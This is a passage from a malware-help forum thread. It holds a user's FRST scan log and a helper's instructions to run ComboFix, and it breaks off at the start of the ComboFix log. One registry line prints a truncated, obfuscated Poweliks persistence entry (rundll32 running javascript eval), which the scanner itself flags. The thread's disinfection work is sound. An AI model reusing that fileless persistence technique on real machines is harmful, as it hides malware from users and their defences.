MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
NTRU TCG Software Stack (Version: 2.1.37 - Security Innovation, Inc.) Hidden
PC-CCID (Version: 2.0.0 - Gemalto) Hidden
Preboot Manager (Version: 03.03.00.090 - Wave Systems Corp.) Hidden
Private Information Manager (Version: 07.01.00.030 - Wave Systems Corp.) Hidden
QuoteExpress Sheetmetal Workstation (HKLM-x32\...\QuoteExpress Sheetmetal Workstation) (Version:  - Quote Software)
Raptr (HKLM-x32\...\Raptr) (Version:  - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5907 - Realtek Semiconductor Corp.)
Sentinel Protection Installer 7.3.2 (HKLM-x32\...\{EDFE2142-CFB3-44AB-A961-DE85F6408A28}) (Version: 7.3.2 - SafeNet, Inc.)
SPBA 5.9 (Version: 5.9.4.6901 - UPEK Inc.) Hidden
Spotify (HKCU\...\Spotify) (Version: 0.9.12.10.g89b2a4fc - Spotify AB)
ToolBook 11.0 Runtime (HKLM-x32\...\{715CA5EF-E3EC-4275-9658-FCBEC080A7D1}) (Version: 11.0.0.22 - SumTotal Systems, Inc.)
ToolBook Neuron (HKLM-x32\...\{DF0038DC-A9B7-4F52-8CA4-C79A3CA631FA}) (Version: 9.0.0.0 - SumTotal Systems, Inc.)
toolkit32for64bit (x32 Version: 7.67.47.0000 - Wave Systems Corp) Hidden
TOSHIBA Call Manager (HKLM-x32\...\TOSHIBA Call Manager) (Version: 8.0.6.3 - Toshiba America Information Systems, Inc)
Toshiba TSP for Windows x64 (HKLM\...\{87C62091-B343-4F5F-A090-FDF42EF71DF2}) (Version: 8.0.12 - Toshiba America Information Systems, Inc.)
Trade Service Online Link Update Manager v1.1.16 (HKLM-x32\...\{C9099687-F025-41C0-9263-55D1CC695B61}) (Version: 1.1.16 - Trade Service, A Trimble Company)
TRA-SER SX Link Export Bridge v1.1.0 (HKLM-x32\...\{BE00941F-2156-442F-9851-61E759481FFD}) (Version: 1.1.0 - Trade Service Company LLC)
Trusted Drive Manager (Version: 4.5.0.136 - Wave Systems Corp.) Hidden
Update for Microsoft Excel 2010 (KB2837600) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4ACD847E-547D-493F-9A86-F73EAE1B5174}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2837594) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{D3C85176-ACCC-4AF0-817D-1BC803303B74}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2837594) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{D3C85176-ACCC-4AF0-817D-1BC803303B74}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553065) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{A8686D24-1E89-43A1-973E-05A258D2B3F8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553267) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{18B3CF2A-73F7-4716-B1AE-86D68726D408}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553310) 32-Bit Edition (HKLM-x32\...\{90140000-006E-0409-0000-0000000FF1CE}_Office14.SingleImage_{73E67A3A-8D61-44EF-90C2-1697C3DBE668}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553378) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{14B7142F-D7E2-4FB0-9E3B-7CAA8D7FFC56}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2566458) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{EFB525A0-E1C0-4E32-9968-FE401BC87363}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2596964) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ED31DE9A-3E13-4E2C-9106-E0D8AFFB9FA6}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{1CBEDB37-C438-473F-8BA0-2535B0D237E2}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{1CBEDB37-C438-473F-8BA0-2535B0D237E2}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{C0BDC1DE-C35E-422B-8CBD-C1D555468720}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2553290) 32-Bit Edition (HKLM-x32\...\{90140000-00A1-0409-0000-0000000FF1CE}_Office14.SingleImage_{9865DC3A-2898-48D9-B96A-46397571C934}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{1EEFF749-6F29-4F0B-AB08-4C6EA52AA110}) (Version:  - Microsoft)
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{BC6DFBFD-16DD-47E1-A7EF-2C062930FA4F}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2553444) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{799005D3-9B70-4219-AFE0-BC479614CC4D}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}) (Version:  - Microsoft)
Upek Touchchip Fingerprint Reader (Version: 1.2.004 - Dell Inc.) Hidden
Wave Crypto Runtime 2.0.7.0 x86 (x32 Version: 02.00.07.0000 - Wave Systems Corp) Hidden
Wave Infrastructure Installer (Version: 07.67.60.0020 - Wave Systems Corp) Hidden
Wave Support Software Installer (Version: 05.13.00.051 - Wave Systems Corp) Hidden
Windows Driver Package - Dell Inc. PBADRV System  (09/11/2009 1.0.1.6) (HKLM\...\9512AA21B791B05A54E27065C45BBC417AB282DF) (Version: 09/11/2009 1.0.1.6 - Dell Inc.)
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Messenger (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Remote Client (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Client Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Small Business Server 2008 ClientAgent (HKLM\...\{E4FF4DF1-F99C-49AC-B398-BE0887432846}) (Version: 6.0.5601.0 - Microsoft Corporation)
Windows Small Business Server 2008 Desktop Links Gadget (HKLM\...\{F5E5D7CA-0F94-41A3-8106-66473C2F3728}) (Version: 6.0.5601.0 - Microsoft Corporation)
Windows Small Business Server 2008 WMI Provider (x32 Version: 6.0.5601.0 - Microsoft Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-462157724-132793273-1689201830-1165_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================

23-07-2014 07:00:00 Scheduled Checkpoint
31-07-2014 07:00:00 Scheduled Checkpoint
06-08-2014 10:00:12 Windows Update
14-08-2014 07:00:02 Scheduled Checkpoint
21-08-2014 16:35:19 Installed CCMComInterface.
21-08-2014 16:36:01 Installed Toshiba TSP for Windows x64.
27-08-2014 21:53:35 Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 19:34 - 2009-06-10 14:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {9D553F00-00A2-49D2-9EF7-91B0DB6371A8} - System32\Tasks\TSOLnkUpdAlertTask => C:\Program Files (x86)\Trade Service\Trade Service Online Link Update Manager\TSOLnkUpdAlert.exe [2013-10-08] (Trade Service, A Trimble Company)
Task: {BDB1D743-5BC8-44A4-9373-8F8DE671AB54} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-10] (PC-Doctor, Inc.)
Task: C:\Windows\Tasks\TSOLnkUpdAlertTask.job => C:\Program Files (x86)\Trade Service\Trade Service Online Link Update Manager\TSOLnkUpdAlert.exe

==================== Loaded Modules (whitelisted) =============

2012-01-17 06:45 - 2012-01-17 06:45 - 00218504 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
2012-01-17 06:45 - 2012-01-17 06:45 - 00038792 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\DeviceStatus.dll
2011-10-08 21:56 - 2011-10-08 21:56 - 00003072 _____ () C:\Program Files (x86)\NTRU Cryptosystems\NTRU TCG Software Stack\bin\TspPopup_ENU.dll
2011-11-07 06:55 - 2011-11-07 06:55 - 00094720 _____ () C:\Windows\system32\Wavx_ESC_Logging.dll
2006-12-08 14:42 - 2013-02-11 20:23 - 00155136 _____ () C:\Windows\system32\BioAPI100.dll
2006-12-08 14:41 - 2013-02-11 20:23 - 00239104 _____ () C:\Windows\system32\BIOAPI_MDS300.dll
2014-03-14 03:21 - 2014-03-14 03:21 - 00172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\fe037daff2a38d4444d6179a4cada248\IsdiInterop.ni.dll
2013-02-11 20:17 - 2012-05-30 12:55 - 00059904 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
2013-02-11 20:21 - 2012-10-22 17:22 - 01199648 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll
2014-08-21 09:37 - 2014-08-21 09:37 - 00039424 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\AxInterop.PLAYRECLib\316a2eef99b6f67bd901d7f695dce92b\AxInterop.PLAYRECLib.ni.dll
2014-08-21 09:35 - 2014-01-14 16:14 - 00204800 _____ () C:\Program Files (x86)\Toshiba\CallManager\CcmConfiguration.XmlSerializers.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\atashost => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (08/28/2014 01:57:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16561, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 9.0.8112.16561, time stamp: 0x53925522
Exception code: 0xc00000fd
Fault offset: 0x00417f35
Faulting process id: 0x540c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (08/28/2014 07:15:13 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CSQuoteSoftImageConverter.exe, version: 1.0.0.0, time stamp: 0x5314dfdc
Faulting module name: KERNELBASE.dll, version: 6.1.7601.18409, time stamp: 0x5315a05a
Exception code: 0xe0434f4d
Fault offset: 0x000000000000940d
Faulting process id: 0x%9
Faulting application start time: 0xCSQuoteSoftImageConverter.exe0
Faulting application path: CSQuoteSoftImageConverter.exe1
Faulting module path: CSQuoteSoftImageConverter.exe2
Report Id: CSQuoteSoftImageConverter.exe3

Error: (08/28/2014 07:06:46 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/27/2014 10:34:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16561, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 9.0.8112.16561, time stamp: 0x53925522
Exception code: 0xc0000005
Fault offset: 0x00432511
Faulting process id: 0x38c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (08/27/2014 04:26:10 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/27/2014 04:13:11 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/27/2014 03:09:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CSQuoteSoftImageConverter.exe, version: 1.0.0.0, time stamp: 0x5314dfdc
Faulting module name: KERNELBASE.dll, version: 6.1.7601.18409, time stamp: 0x5315a05a
Exception code: 0xe0434f4d
Fault offset: 0x000000000000940d
Faulting process id: 0x%9
Faulting application start time: 0xCSQuoteSoftImageConverter.exe0
Faulting application path: CSQuoteSoftImageConverter.exe1
Faulting module path: CSQuoteSoftImageConverter.exe2
Report Id: CSQuoteSoftImageConverter.exe3

Error: (08/27/2014 03:05:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CSQuoteSoftImageConverter.exe, version: 1.0.0.0, time stamp: 0x5314dfdc
Faulting module name: KERNELBASE.dll, version: 6.1.7601.18409, time stamp: 0x5315a05a
Exception code: 0xe0434f4d
Fault offset: 0x000000000000940d
Faulting process id: 0x%9
Faulting application start time: 0xCSQuoteSoftImageConverter.exe0
Faulting application path: CSQuoteSoftImageConverter.exe1
Faulting module path: CSQuoteSoftImageConverter.exe2
Report Id: CSQuoteSoftImageConverter.exe3

Error: (08/27/2014 03:04:51 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CSQuoteSoftImageConverter.exe, version: 1.0.0.0, time stamp: 0x5314dfdc
Faulting module name: KERNELBASE.dll, version: 6.1.7601.18409, time stamp: 0x5315a05a
Exception code: 0xe0434f4d
Fault offset: 0x000000000000940d
Faulting process id: 0x%9
Faulting application start time: 0xCSQuoteSoftImageConverter.exe0
Faulting application path: CSQuoteSoftImageConverter.exe1
Faulting module path: CSQuoteSoftImageConverter.exe2
Report Id: CSQuoteSoftImageConverter.exe3

Error: (08/27/2014 02:51:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

System errors:
=============
Error: (08/28/2014 07:11:28 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.

Error: (08/28/2014 07:07:36 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {0002DF01-0000-0000-C000-000000000046}

Error: (08/28/2014 07:06:35 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (08/28/2014 07:05:07 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NTRU TSS v1.2.1.37 TCS service depends on the TPM Base Services service which failed to start because of the following error:
%%0

Error: (08/28/2014 07:05:05 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 7:03:10 AM on ‎8/‎28/‎2014 was unexpected.

Error: (08/27/2014 04:25:48 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (08/27/2014 04:24:40 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NTRU TSS v1.2.1.37 TCS service depends on the TPM Base Services service which failed to start because of the following error:
%%0

Error: (08/27/2014 04:23:50 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (08/27/2014 04:22:06 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (08/27/2014 04:22:06 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Microsoft Office Sessions:
=========================
Error: (08/28/2014 01:57:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe9.0.8112.165614a5bc6b7MSHTML.dll9.0.8112.1656153925522c00000fd00417f35540c01cfc302047a7683C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dlled010fdd-2ef5-11e4-b45d-90b11c94c645

Error: (08/28/2014 07:15:13 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: CSQuoteSoftImageConverter.exe1.0.0.05314dfdcKERNELBASE.dll6.1.7601.184095315a05ae0434f4d000000000000940d

Error: (08/28/2014 07:06:46 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/27/2014 10:34:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe9.0.8112.165614a5bc6b7MSHTML.dll9.0.8112.1656153925522c00000050043251138c01cfc27fb5116705C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dlle9c1e280-2e74-11e4-b6d5-90b11c94c645

Error: (08/27/2014 04:26:10 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/27/2014 04:13:11 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/27/2014 03:09:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: CSQuoteSoftImageConverter.exe1.0.0.05314dfdcKERNELBASE.dll6.1.7601.184095315a05ae0434f4d000000000000940d

Error: (08/27/2014 03:05:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: CSQuoteSoftImageConverter.exe1.0.0.05314dfdcKERNELBASE.dll6.1.7601.184095315a05ae0434f4d000000000000940d

Error: (08/27/2014 03:04:51 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: CSQuoteSoftImageConverter.exe1.0.0.05314dfdcKERNELBASE.dll6.1.7601.184095315a05ae0434f4d000000000000940d

Error: (08/27/2014 02:51:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

==================== Memory info ===========================

Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 21%
Total physical RAM: 8146.39 MB
Available physical RAM: 6370.52 MB
Total Pagefile: 16290.97 MB
Available Pagefile: 13635.48 MB
Total Virtual: 8192 MB
Available Virtual: 8191.79 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:464.98 GB) (Free:389.97 GB) NTFS
Drive g: (Data) (Network) (Total:840 GB) (Free:370.73 GB) NTFS
Drive p: (Data) (Network) (Total:840 GB) (Free:370.73 GB) NTFS
Drive q: () (Network) (Total:99.9 GB) (Free:28.3 GB) NTFS
Drive x: () (Network) (Total:99.9 GB) (Free:28.3 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: E4103F4C)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=752 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=465 GB) - (Type=07 NTFS)

==================== End Of Log ============================

#4 aharonov

  • Malware Response Team
  • 2,441 posts
  • Gender:Male
  • Local time:10:23 AM

Posted 28 August 2014 - 04:26 PM

Ok.

Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the real-time protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#5 LynnBR

  • Topic Starter
  • Members
  • 104 posts
  • Gender:Female
  • Local time:01:23 AM

Posted 28 August 2014 - 04:33 PM

Aharonov, I forgot to mention that I have run scans with Malwarebytes which came up clean, and have ESET running as you can see in the report. I have seen ESET popups about blocked websites, which is what steered me here even though scans came back clean. Saw that I am not alone in this problem.

#6 aharonov

  • Malware Response Team
  • 2,441 posts
  • Gender:Male
  • Local time:10:23 AM

Posted 28 August 2014 - 04:36 PM

Thanks for letting me know.
The FRST log clearly shows that you're infected irrespective of what Malwarebytes and ESET say. :)
Just continue with Combofix as advised in my last post.

Edited by aharonov, 28 August 2014 - 04:36 PM.

#7 LynnBR

  • Topic Starter
  • Members
  • 104 posts
  • Gender:Female
  • Local time:01:23 AM

Posted 28 August 2014 - 05:00 PM

Aharonov, here is the ComboFix log. And yes, after the website blocks I assumed there was a nasty in here.

ComboFix 14-08-28.01 - mike 08/28/2014  14:36:59.1.8 - x64
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.8146.6481 [GMT -7:00]
Running from: c:\users\mike\Desktop\ComboFix.exe
AV: ESET Endpoint Antivirus 5.0 *Disabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
